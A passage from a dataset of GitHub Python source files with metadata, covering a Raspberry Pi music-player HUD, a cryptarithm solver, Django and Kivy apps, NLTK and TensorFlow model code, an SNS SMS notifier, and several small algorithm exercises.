Label(f6,textvariable=v,width=35)\nindex = 0\n\n\n\n\ndef directorychooser():\n directory=\"/home/pi/Desktop\"\n os.chdir(directory)\n\n for files in os.listdir(directory):\n if files.endswith(\".mp3\"):\n listofsongs.append(files)\n\n pygame.mixer.init()\n pygame.mixer.music.load(listofsongs[0])\n pygame.mixer.music.play()\n\ndirectorychooser()\n\ndef updatelabel():\n global index\n global songname\n v.set(listofsongs[index])\n\ndef nextsong(event):\n global index\n if index0:\n index -= 1\n else:\n index=len(listofsongs)-1\n pygame.mixer.music.load(listofsongs[index])\n pygame.mixer.music.play()\n updatelabel()\n\ndef stopsong(event):\n pygame.mixer.music.stop()\n v.set(\"\")\n\ndef playsong(event):\n pygame.mixer.init()\n pygame.mixer.music.load(listofsongs[index])\n pygame.mixer.music.play()\n updatelabel()\n\nlistbox = Listbox(f6)\nlistbox.pack()\n\nlistofsongs.reverse()\n\nfor items in listofsongs:\n listbox.insert(0,items)\n\nlistofsongs.reverse()\n\nnextbutton = Button(f6,text = 'Next Song')\nnextbutton.pack()\n\npreviousbutton = Button(f6,text = 'Previous Song')\npreviousbutton.pack()\n\nstopbutton = Button(f6,text='Stop Music')\nstopbutton.pack()\n\nplaybutton = Button(f6,text='Play Music')\nplaybutton.pack()\n\n\n\n# LIDAR CODE\n\nLabel(f7,text='LIDAR TEST',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\nLabel(f7,textvariable=lidar_distancelabel,bg='black',fg='white',font=(\"Courier New\",70)).pack(side=TOP,pady=10)\nLabel(f7,text='Feet',bg='black',fg='white',font=(\"Courier New\",44)).pack(side=TOP,pady=10)\n\n\n#-------------------------------------------------------------------------------------------------------------------------------------------\n\n\nraise_frame(f1)\n\n\nroot.bind('',leftKey)\nroot.bind('',rightKey)\n\nnextbutton.bind(\"\",nextsong)\npreviousbutton.bind(\"\",prevsong)\nstopbutton.bind(\"\",stopsong)\nplaybutton.bind(\"\",playsong)\nsonglabel.pack()\n\nroot.mainloop()\n\n\n","repo_name":"Harshpatel40/HUD","sub_path":"mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":15520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1670954642","text":"\n\ndef get_mask(i):\n if i == 8:\n s,e,n,d,m,o,r,y = a[:8]\n send = 1000*s + 100*e + 10*n + d\n more = 1000*m + 100*o + 10*r + e\n money = 10000*m + 1000*o + 100*n + e*10 + y\n if (s != 0 and m != 0) and (send + more == money):\n print(send, more, money)\n print(s,e,n,d,m,o,r,y)\n\n for j in range(i, digit):\n a[i], a[j] = a[j], a[i]\n get_mask(i+1)\n a[i], a[j] = a[j], a[i]\n\n\ndef str_mask(i, x=''):\n if i == 8:\n s,e,n,d,m,o,r,y = x\n send = int(s+e+n+d)\n more = int(m+o+r+e)\n money = int(m+o+n+e+y)\n if (s != '0' and m != '0') and (send + more == money):\n print(send, more, money)\n print(x)\n\n\n for j in range(i, digit):\n a[i], a[j] = a[j], a[i]\n str_mask(i+1, x+a[i])\n a[i], a[j] = a[j], a[i]\n\n\n\n\ndef find_mask(i, x=''):\n # permutation complete\n if i == len(chars):\n # now assess if the assigned num-to-char is valid\n \n # apply permutation to the dictionary\n d = dict(zip(chars, x))\n # for k, v in enumerate(x):\n # d[chars[k]] = v\n \n word1 = ''\n word2 = '' \n word3 = ''\n for c in w1:\n word1 += d[c]\n for c in w2:\n word2 += d[c]\n for c in w3:\n word3 += d[c]\n \n # check if number is valid for each word (remove numbers with 0 start)\n # and satisfies the addition\n if ((word1[0] != '0' and word2[0] != '0' and word3[0] != '0') \n and (int(word1) + int(word2) == int(word3))):\n print(word1, word2, word3)\n\n # find all permutations of number-to-character\n for j in range(i, digit):\n a[i], a[j] = a[j], a[i]\n find_mask(i+1, x+a[i])\n a[i], a[j] = a[j], a[i]\n \n \n\n# digits\ndigit = 10\na = [str(i) for i in range(digit)]\n\nd = {}\n# assume all input will come in the following form in 1 line:\n# word1 word2 word3\n# and operation is always addition\n# ie. word1 + word2 = word3\n\n# w1, w2, w3 = input().split()\ninput = input().split()\n\n# find unique characters of input\nchars = []\nw1 = input[0]\nw2 = input[1]\nw3 = input[2]\nfor w in input:\n for c in w:\n if c not in chars:\n chars.append(c)\nprint(chars)\n\n# use set to extract unique characters\nset_chars = list(set(w1+w2+w3)) \nprint(set_chars)\n# drive code\nfind_mask(0)\n\n# get_mask(0)\n# str_mask(0)\n","repo_name":"yehyunchoi/Algorithm","sub_path":"prev_problems/mask_number.py","file_name":"mask_number.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33953803281","text":"import nltk.classify.util\nfrom nltk.classify import NaiveBayesClassifier\nfrom nltk.corpus import product_reviews_1\nfrom nltk import precision, recall\nimport AspectFinder\nimport collections\n\n\ndef word_feats(words):\n return dict([(word, True) for word in words])\n\ndef evaluate_classifier(classifier):\n aspects = AspectFinder.AspectFinder().get_aspects()\n\n minus = [f for f in aspects if f[1][0]==\"-\"]\n plus = [f for f in aspects if f[1][0]==\"+\"]\n\n sentences = [' '.join(s) for s in product_reviews_1.sents()]\n\n minusfeats = [(word_feats(s.split()), '-') for s in sentences for f in minus if s.find(f[0])!=-1]\n plusfeats = [(word_feats(s.split()), '+') for s in sentences for f in plus if s.find(f[0])!=-1]\n\n minuscutoff = int(len(minusfeats)*3/4)\n pluscutoff = int(len(plusfeats)*3/4)\n\n trainfeats = minusfeats[:minuscutoff] + plusfeats[:pluscutoff]\n testfeats = minusfeats[minuscutoff:] + plusfeats[pluscutoff:]\n print('train on %d instances, test on %d instances' % (len(trainfeats), len(testfeats)))\n\n\n classifier = train(classifier, trainfeats)\n refsets = collections.defaultdict(set)\n testsets = collections.defaultdict(set)\n\n for i, (feats, label) in enumerate(testfeats):\n refsets[label].add(i)\n observed = classifier.classify(feats)\n testsets[observed].add(i)\n\n print('accuracy:', nltk.classify.util.accuracy(classifier, testfeats))\n print('pos precision:', precision(refsets['pos'], testsets['pos']))\n print('pos recall:', recall(refsets['pos'], testsets['pos']))\n print('neg precision:', precision(refsets['neg'], testsets['neg']))\n print('neg recall:', recall(refsets['neg'], testsets['neg']))\n classifier.show_most_informative_features()\n print(classifier.classify(word_feats([\"I\", \"hate\", \"it\", \".\"])))\n print(classifier.classify(word_feats([\"I\", \"love\", \"it\", \".\"])))\n\ndef train(classifier, trainfeats, traintargets=[]):\n try:\n classifier = classifier.train(trainfeats)\n except AttributeError:\n classifier = classifier.fit(trainfeats, traintargets)\n\n return classifier\n\nif __name__ == '__main__':\n evaluate_classifier(NaiveBayesClassifier)","repo_name":"frederikflpl/BACode","sub_path":"SentimentAnalyzer.py","file_name":"SentimentAnalyzer.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15030196797","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom .models import Post, Page, BlogTitle\n\nPAGES = Page.objects.all()\nTITLE = BlogTitle.objects.all()\nif TITLE:\n TITLE = TITLE[0]\nelse:\n TITLE = BlogTitle()\n\ndef post_list(request):\n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n return render(request, 'blog/post_list.html', {'posts': posts, 'pages': PAGES, 'title': TITLE})\n\ndef post_detail(request, pk):\n post = get_object_or_404(Post, pk=pk)\n return render(request, 'blog/post_detail.html', {'post': post, 'pages': PAGES, 'title': TITLE})\n\ndef page(request, pg):\n page = get_object_or_404(Page, title=pg)\n return render(request, 'blog/page.html', {'page': page, 'pages': PAGES, 'title': TITLE})\n\ndef handler404(request):\n response = render(request, 'blog/404.html', {'pages': PAGES, 'title': TITLE})\n response.status_code = 404\n return response","repo_name":"Nick-the-BinaryTree/dropshadow","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29697502496","text":"from __future__ import division\nimport logging\nimport modules.Config as cfg\nfrom kivy.uix.button import Button\n\n\nclass Plr:\n\n def __init__(self, num):\n self.logger = logging.getLogger('driver.modules.Plrs.Plr')\n self.num = num + 1\n self.x = 0 - num - 1\n self.y = 0 - num - 1\n self.status = cfg.PLR_WAITING\n self.printChar = cfg.PLR_POINT\n self.button = Button()\n\n info = self.PrintPlr()\n self.logger.info('# Initializing plr: %s' % info)\n\n def getButton(self):\n\n return self.button\n\n def setButton(self):\n\n self.button = Button(\n text='%s' % (self.num),\n size_hint=((1 / cfg.GRID_SIZE), (1 / cfg.GRID_SIZE)),\n background_color=[3,2,1,3],\n font_size=9,\n pos=(self.x * cfg.BLOCK_SIZE, self.y * cfg.BLOCK_SIZE + (2 * cfg.BLOCK_SIZE)))\n\n def PrintPlr(self):\n return('id: %s, printChar: %s, x: %s, y: %s' % (self.num, self.printChar, self.x, self.y))\n","repo_name":"jwgreene1/Grid","sub_path":"modules/Plrs.py","file_name":"Plrs.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6906030961","text":"from django.shortcuts import redirect, render\nimport json\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom eqrApp import models, forms\nfrom django.db.models import Q\nfrom django.contrib.auth import authenticate, login, logout, update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\n\n\n\ndef context_data():\n context = {\n 'page_name' : '',\n 'page_title' : 'Proyecto',\n 'system_name' : 'Detector y generador de codigo QR y de barras',\n 'topbar' : True,\n 'footer' : True,\n }\n\n return context\n\n\n# Create your views here.\ndef login_page(request):\n context = context_data()\n context['topbar'] = False\n context['footer'] = False\n context['page_name'] = 'login'\n context['page_title'] = 'Login'\n return render(request, 'login.html', context)\n\ndef login_user(request):\n logout(request)\n resp = {\"status\":'failed','msg':''}\n username = ''\n password = ''\n if request.POST:\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n resp['status']='success'\n else:\n resp['msg'] = \"Nombre de usuario o contraseña incorrecto\"\n else:\n resp['msg'] = \"Nombre de usuario o contraseña incorrecto\"\n return HttpResponse(json.dumps(resp),content_type='application/json')\n\n@login_required\ndef home(request):\n context = context_data()\n context['page'] = 'home'\n context['page_title'] = 'Home'\n context['employees'] = models.Employee.objects.count()\n return render(request, 'home.html', context)\n\ndef logout_user(request):\n logout(request)\n return redirect('login-page')\n\n\n@login_required\ndef employee_list(request):\n context =context_data()\n context['page'] = 'Listado Vcard'\n context['page_title'] = 'Listado de Vcard'\n context['employees'] = models.Employee.objects.all()\n\n return render(request, 'employee_list.html', context)\n\n@login_required \ndef manage_employee(request, pk=None):\n context =context_data()\n if pk is None:\n context['page'] = 'Añadir_Vcard'\n context['page_title'] = 'Añadir Vcard'\n context['employee'] = {}\n else:\n context['page'] = 'Editar_vcard'\n context['page_title'] = 'Actualizar Vcard'\n context['employee'] = models.Employee.objects.get(id=pk)\n\n return render(request, 'manage_employee.html', context)\n\n@login_required\ndef save_employee(request):\n resp = { 'status' : 'failed', 'msg' : '' }\n if not request.method == 'POST':\n resp['msg'] = \"No se han enviado datos a la solicitud.\"\n\n else:\n if request.POST['id'] == '':\n form = forms.SaveEmployee(request.POST, request.FILES)\n else:\n employee = models.Employee.objects.get(id = request.POST['id'])\n form = forms.SaveEmployee(request.POST, request.FILES, instance = employee)\n if form.is_valid():\n form.save()\n if request.POST['id'] == '':\n messages.success(request, f\"{request.POST['codigo_empleado']} se ha añadido con éxito.\")\n else:\n messages.success(request, f\"{request.POST['codigo_empleado']} se ha actualizado correctamente.\")\n resp['status'] = 'success'\n else:\n for field in form:\n for error in field.errors:\n if not resp['msg'] == '':\n resp['msg'] += str(\"
\")\n resp['msg'] += str(f\"[{field.label}] {error}\")\n\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n@login_required\ndef view_card(request, pk =None):\n if pk is None:\n return HttpResponse(\"El id de la Vcard es invalido\")\n else:\n context = context_data()\n context['employee'] = models.Employee.objects.get(id=pk)\n return render(request, 'view_id.html', context)\n\n@login_required\ndef view_scanner(request):\n context = context_data()\n return render(request, 'scanner.html', context)\n\n\n@login_required\ndef view_details(request, code = None):\n if code is None:\n return HttpResponse(\"El código de Vcard no es válido\")\n else:\n context = context_data()\n context['employee'] = models.Employee.objects.get(codigo_empleado =code)\n return render(request, 'view_details.html', context)\n\n@login_required\ndef delete_employee(request, pk=None):\n resp = { 'status' : 'failed', 'msg' : '' }\n if pk is None:\n resp['msg'] = \"No se han enviado datos a la solicitud.\"\n else:\n try:\n models.Employee.objects.get(id=pk).delete()\n resp['status'] = 'success'\n messages.success(request, 'La Vcard ha sido eliminada con éxito.')\n except:\n resp['msg'] = \"La Vcard no se pudo eliminar.\"\n\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n","repo_name":"jgonzalezr2021/proyecto-Qr","sub_path":"proyectoQr/eqrApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34343616630","text":"# 开发者: Hei Guang\n# 开发时间:2022/10/20 20:28\nimport csv\nimport os\n\nif __name__ == '__main__':\n dir = '/Volumes/西数S770/2022_malware_feature'\n list=[]\n i = 0\n for file in os.listdir(dir):\n if \"API\" in file:\n i = i + 1\n try:\n with open(dir + os.sep + file, 'r', encoding='utf8') as fp:\n line = fp.readline().split(';')[0]\n while line:\n if 'androidx' in line and line not in list:\n with open(\"logsuccess.txt\",\"a\") as success:\n success.write(line.replace('/','.').strip('L')+\"\\n\")\n list.append(line)\n print(line)\n line = fp.readline().split(';')[0]\n fp.close()\n except Exception as e:\n with open(\"logerror.txt\",'a') as record:\n record.write(str(e)+\"\\t\\t\\t\\t\"+file+\"\\n\")\n\n\nprint('已经解析' + str(i) + \"个文件\")\nprint('解析出得api为:'+'\\n'+list)","repo_name":"heiguang1234/Xmal-master","sub_path":"Code/wirte_csv.py","file_name":"wirte_csv.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34165775277","text":"import datetime\nimport cv2\nimport numpy as np\nimport math\n\ncap = cv2.VideoCapture('vids/people_walking.mp4')\n\nframes = []\ncounter = 0\n\nlength = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\nw = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nh = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\nwhile(cap.isOpened()):\n\n\n ret, frame = cap.read()\n\n if counter % math.floor(length/15) == 0:\n frames.append(frame)\n\n\n if ret == False:\n frames.pop()\n break\n\n counter +=1\n\ncap.release()\n\ncv2.destroyAllWindows()\n\n\nprint(\"number of frames\", len(frames))\n\n# median\nnp_frames = np.array(frames)\n\n\nfinal_img = np.median(np_frames, axis=0)\n\n#%%\ncv2.imwrite(f'output/image{datetime.datetime.now()}.jpg', final_img)\ncv2.imshow('Frame',final_img/255)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# %%\n","repo_name":"matty5567/ImageCleaner","sub_path":"median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8307760231","text":"#!/usr/bin/env python3\n\nfrom tkinter import *\nfrom tkinter import ttk\n\n# GUI: Graphical User Interface\n# tkinter is a Python \"wrapper\" around Tcl/Tk GUI framework.\n#\n# To run a basic demo and test if it's working\n# on your system, run the following command:\n# python -m tkinter\n\n# create a root widget\nroot = Tk()\n\n# set the window title\nroot.title(\"SITPAS\")\n\n# Background color\nroot.configure(background=\"blue\")\n\n# Smallest size it can be\nroot.minsize(500, 500) # width, height\n\n# Largest size it can be\nroot.maxsize(1000, 1000)\n\n# Where the window starts on the screen\nroot.geometry(\"300x300+50+50\") # width x height + x + y\n\n# There are several ways to place stuff in the GUI\n# .pack() : relative to other items, auto-decided by Tk\n# .grid() : more precise\n\n# Create some text labels\nLabel(root, text=\"What's your label\").pack()\n# label_1.pack()\nlabel_2 = Label(root, text=\"this is a label too\")\nlabel_2.pack()\n\n# add a image file\nimage = PhotoImage(file=\"labtocat.png\", height=300, width=300)\nimage.zoom(2)\nimg = Label(root, image=image) # images are associated with labels\nimg.pack()\n\ndef killProgram():\n root.destroy()\n\n# Add a button to exit the program\nfrm = ttk.Frame(root, padding=10)\nfrm.pack()\nLabel(frm, text=\"Hello World!\").pack()\nButton(frm, text=\"Quit\", command=killProgram).pack()\n\n# start the gui\nroot.mainloop()\n","repo_name":"GhostofGoes/SITPAS","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14371830059","text":"import boto3\nimport json\n\nfrom notification.globalutils import sns_client, logger\n\n\nclass Send_Sms:\n\n def sms_send(self, alert_info):\n '''\n This method is to send alerts using mobile\n '''\n\n mobile_numbers = json.loads(alert_info['mobile_num'])\n\n for number in mobile_numbers:\n number = '+1' + str(number)\n\n logger.info(\n 'An alert is being sent for the mobile number {0}'.format(number))\n\n if 'asin' in alert_info:\n amazon_link = 'https://www.amazon.com/dp/{0}'.format(\n alert_info['asin'])\n\n amazon_orbit_link = 'https://app.amzorbit.com/#/product/{0}'.format(\n alert_info['product_id'])\n\n links = \" [View On AmzOrbit: {0}] [View On Amazon: {1}]\".format(\n amazon_orbit_link, amazon_link)\n\n attributes = ', '.join(json.loads(\n alert_info['diffAttributes']))\n\n message = alert_info['message'] + \":\" + \\\n ' {0}'.format(attributes)\n\n message = \"Amzorbit Alert for {0}: {1} {2} {3} \".format(\n alert_info['asin'], message, (alert_info['title'][:20])+'..', links)\n else:\n message = alert_info['message']\n\n response = sns_client.publish(\n PhoneNumber=number, Message=message)\n\n logger.info('An alert is sent using sns client with the response {0}'.format(\n json.dumps(response)))\n","repo_name":"rnama22/amzorbit","sub_path":"notificationmanagement/notification/sms/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10550558487","text":"#!/usr/bin/env python2.7\n\"\"\"Read checkpoint and export model.\n\nUsage: lead_saved.py [--model_version=x] [--checkpoint_dir=y] export_dir\n\"\"\"\n\nimport os.path\nimport sys\nimport tensorflow as tf \nimport numpy as np\nfrom tensorflow.contrib import learn\n\ntf.app.flags.DEFINE_integer('model_version', 1, 'version number of the model.')\ntf.app.flags.DEFINE_string('checkpoint_dir', None, 'checkpoint directory.')\n\n# Model Hyperparameters\ntf.app.flags.DEFINE_integer(\"embedding_dim\", 300, \"Dimensionality of character embedding (default: 300)\")\ntf.app.flags.DEFINE_string(\"filter_sizes\", 5, \"Comma-separated filter sizes (default: '3,4,5')\")\ntf.app.flags.DEFINE_integer(\"num_filters\", 5, \"Number of filters per filter size (default: 128)\")\n\nFLAGS = tf.app.flags.FLAGS\n\nNUM_TOP_CLASSES = 2\n\ndef export():\n\tif len(sys.argv) < 3 or sys.argv[-1].startswith('-'):\n\t\tprint('Usage: lead_prediction_saved.py [--model_version=x] [--checkpoint_dir=y] export_dir')\n\t\tsys.exit(-1)\n\tif FLAGS.model_version <= 0:\n\t\tprint ('Please specify a positive value for version number.')\n\t\tsys.exit(-1)\n\n\t# Read the lasted checkpoint and vocab of the model\n\tcheckpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n\n\tvocab_file = os.path.join(FLAGS.checkpoint_dir, \"vocab\")\n\tvocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_file)\n\ttest = \"tmp\"\n\tx_test = np.array(list(vocab_processor.transform(test)))\n\tsequence_length = x_test.shape[1]\n\n\tgraph = tf.Graph()\n\twith graph.as_default():\n\t\t# Input transformation.\n\t\tserialized_tf_example = tf.placeholder(tf.string,name='tf_example')\n\t\tfeature_configs = {'input_x': tf.FixedLenFeature(shape=[sequence_length], dtype=tf.float32)}\n\t\ttf_example = tf.parse_example(serialized_tf_example, feature_configs)\n\t\tinput_x = tf.identity(tf_example['input_x'],name='input_x')\n\n\t\t# Run inference.\n\t\twith tf.Session() as sess:\n\t\t\tsaver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n\t\t\tsaver.restore(sess, checkpoint_file)\n\t\t\t\n\t\t\t# Read embedding layer\n\t\t\tW_embedding = graph.get_operation_by_name(\"embedding/W\").outputs[0]\n\t\t\tembedded_chars = tf.nn.embedding_lookup(W_embedding, tf.to_int32(input_x))\n\t\t\tembedded_chars_expanded = tf.expand_dims(embedded_chars, -1)\n\n\t\t\t# Read convolution + maxpool layer\n\t\t\tfilter_shape = [FLAGS.filter_sizes, FLAGS.embedding_dim, 1, FLAGS.num_filters]\n\t\t\tW_conv_maxpool_5 = graph.get_operation_by_name(\"conv-maxpool-5/W\").outputs[0]\n\t\t\tb_conv_maxpool_5 = graph.get_operation_by_name(\"conv-maxpool-5/b\").outputs[0]\n\t\t\tconv_maxpool_5 = tf.nn.conv2d(embedded_chars_expanded, W_conv_maxpool_5, strides=[1,1,1,1], padding=\"VALID\")\n\t\t\th_conv_maxpool_5 = tf.nn.relu(tf.nn.bias_add(conv_maxpool_5, b_conv_maxpool_5))\n\t\t\tpooled_conv_maxpool_5 = tf.nn.max_pool(h_conv_maxpool_5,ksize=[1,sequence_length-FLAGS.filter_sizes+1, 1, 1], strides=[1,1,1,1], padding=\"VALID\")\n\t\t\th_pool_flat = tf.reshape(pooled_conv_maxpool_5,[-1,FLAGS.num_filters])\n\n\t\t\t# Read final score and prediction layer\n\t\t\tW_output = graph.get_operation_by_name(\"output/W\").outputs[0]\n\t\t\tb_output = graph.get_operation_by_name(\"output/b\").outputs[0]\n\t\t\tscores = tf.nn.xw_plus_b(h_pool_flat, W_output, b_output)\n\t\t\tfinal_scores = tf.nn.softmax(scores)\n\n\t\t\tvalues, indices = tf.nn.top_k(final_scores, NUM_TOP_CLASSES)\n\t\t\ttable = tf.contrib.lookup.index_to_string_table_from_tensor(tf.constant([\"Bad\", \"Good\"]))\n\t\t\tprediction_classes = table.lookup(tf.to_int64(indices))\n\n\t\t\t# Export inference model.\n\t\t\texport_path_base = sys.argv[-1]\n\t\t\toutput_path = os.path.join(tf.compat.as_bytes(export_path_base),tf.compat.as_bytes(str(FLAGS.model_version)))\n\t\t\tprint(\"Exporting trained model to {}\".format(output_path))\n\t\t\tbuilder = tf.saved_model.builder.SavedModelBuilder(output_path)\n\n\t\t\t# Build the signature_def_map.\n\t\t\tclassify_inputs_tensor_info = tf.saved_model.utils.build_tensor_info(serialized_tf_example)\n\t\t\tclasses_output_tensor_info = tf.saved_model.utils.build_tensor_info(prediction_classes)\n\t\t\tscores_output_tensor_info = tf.saved_model.utils.build_tensor_info(values)\n\n\t\t\tclassification_signature = (tf.saved_model.signature_def_utils.build_signature_def(inputs={tf.saved_model.signature_constants.CLASSIFY_INPUTS:classify_inputs_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\toutputs={tf.saved_model.signature_constants.CLASSIFY_OUTPUT_CLASSES:classes_output_tensor_info,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttf.saved_model.signature_constants.CLASSIFY_OUTPUT_SCORES:scores_output_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmethod_name=tf.saved_model.signature_constants.CLASSIFY_METHOD_NAME))\n\t\t\tpredict_inputs_tensor_info = tf.saved_model.utils.build_tensor_info(input_x)\n\t\t\tprediction_signature = (tf.saved_model.signature_def_utils.build_signature_def(inputs={'texts':predict_inputs_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\toutputs={'classes': classes_output_tensor_info,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'scores':scores_output_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmethod_name=tf.saved_model.signature_constants.PREDICT_METHOD_NAME))\n\t\t\tlegacy_init_op = tf.group(tf.tables_initializer(), name='legacy_init_op')\n\t\t\tbuilder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING],signature_def_map={'predict_texts':prediction_signature, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:classification_signature},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlegacy_init_op=legacy_init_op)\n\t\t\tbuilder.save()\n\t\t\tprint (\"Done Exporting!\")\n\n\ndef main(unused_argv=None):\n\texport()\n\n\nif __name__ == '__main__':\n\ttf.app.run()\n\n\t","repo_name":"MingCong18/Lead_Quality_Prediction","sub_path":"lead_saved.py","file_name":"lead_saved.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"4893206180","text":"#! /usr/bin/env python\n\nfrom functools import reduce\nimport math\nimport numpy\nimport scipy.optimize\n\ndef beta_binomial_density(params, n, k):\n\n alpha = params[0]\n beta = params[1]\n\n tempD = math.lgamma(n + 1) - math.lgamma(k + 1) - math.lgamma(n - k + 1)\n tempD = tempD - math.lgamma(n + alpha + beta) + math.lgamma(k + alpha) + math.lgamma(n - k + beta)\n tempD = tempD + math.lgamma(alpha + beta) - math.lgamma(alpha) - math.lgamma(beta) \n\n return math.exp(tempD)\n\ndef beta_binom_pvalue(params, n, k):\n\n tempPV = 0\n for kk in range(k, n + 1):\n\n currentValue = beta_binomial_density(params, n, kk)\n tempPV = tempPV + currentValue\n\n\n return tempPV\n\n\ndef beta_binomial_loglikelihood(params, Ns, Ks):\n\n \"\"\"Calculating log-likelihood of beta-binomial distribution\n\n Args:\n params (List[float]): the parameter of beta distribution ([alpha, beta])\n \n As (numpy.array([int])): the counts for success\n \n Bs (numpy.array([int])): the counts of trials\n\n \"\"\"\n\n alpha = params[0] \n beta = params[1]\n\n ML = 0\n ML = ML + reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns + 1])\n ML = ML - reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ks + 1])\n ML = ML - reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns - Ks + 1])\n \n ML = ML - reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns + alpha + beta])\n ML = ML + reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ks + alpha])\n ML = ML + reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns - Ks + beta])\n\n ML = ML + len(Ns) * (math.lgamma(alpha + beta) - math.lgamma(alpha) - math.lgamma(beta))\n\n\n # Here, we set the penalty term of alpha and beta (0.5 is slightly arbitray...)\n ML = ML - 0.5 * math.log(alpha + beta)\n return -ML\n\n \n\ndef fit_beta_binomial(As, Bs):\n\n \"\"\"Obtaining maximum likelihood estimator of beta-binomial distribution\n\n Args:\n As (numpy.array([int])): the counts for success\n \n Bs (numpy.array([int])): the counts of trials\n\n \"\"\"\n\n result = scipy.optimize.fmin_l_bfgs_b(beta_binomial_loglikelihood,\n [20, 20],\n args = (As, Bs),\n approx_grad = True,\n bounds = [(0.1, 10000000), (1, 10000000)])\n\n return result[0]\n\n\n\n\n","repo_name":"Genomon-Project/EBFilter","sub_path":"ebfilter/beta_binomial.py","file_name":"beta_binomial.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2731037916","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the strangeCounter function below.\ndef strangeCounter(time):\n\n t = 3\n v = 3\n\n while t < time:\n \n v*=2\n t = t+v\n \n if t>=time:\n v = t-time+1\n\n \n\n\n return v\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input())\n\n result = strangeCounter(t)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Kumbong/hackerrank","sub_path":"algorithms/Python/implementation/strange counter.py","file_name":"strange counter.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"21294908065","text":"import sys\nfrom collections import deque\n\nn, m = map(int, sys.stdin.readline().split())\nmaze = [sys.stdin.readline().rstrip() for _ in range(n)]\nmove = ((1, 0), (-1, 0), (0, 1), (0, -1))\nvisited = [[0]*m for _ in range(n)]\nvisited[0][0] = 1\nq = deque([(0, 0)])\n\nwhile q:\n x, y = q.popleft()\n for dx, dy in move:\n nx, ny = x+dx, y+dy\n if 0 <= nx < n and 0 <= ny < m and maze[nx][ny]=='1' and not visited[nx][ny]:\n visited[nx][ny] = visited[x][y] + 1\n q.append((nx, ny))\n\nprint(visited[n-1][m-1])","repo_name":"speciling/ps-study","sub_path":"2주차/지연우/2178 미로탐색.py","file_name":"2178 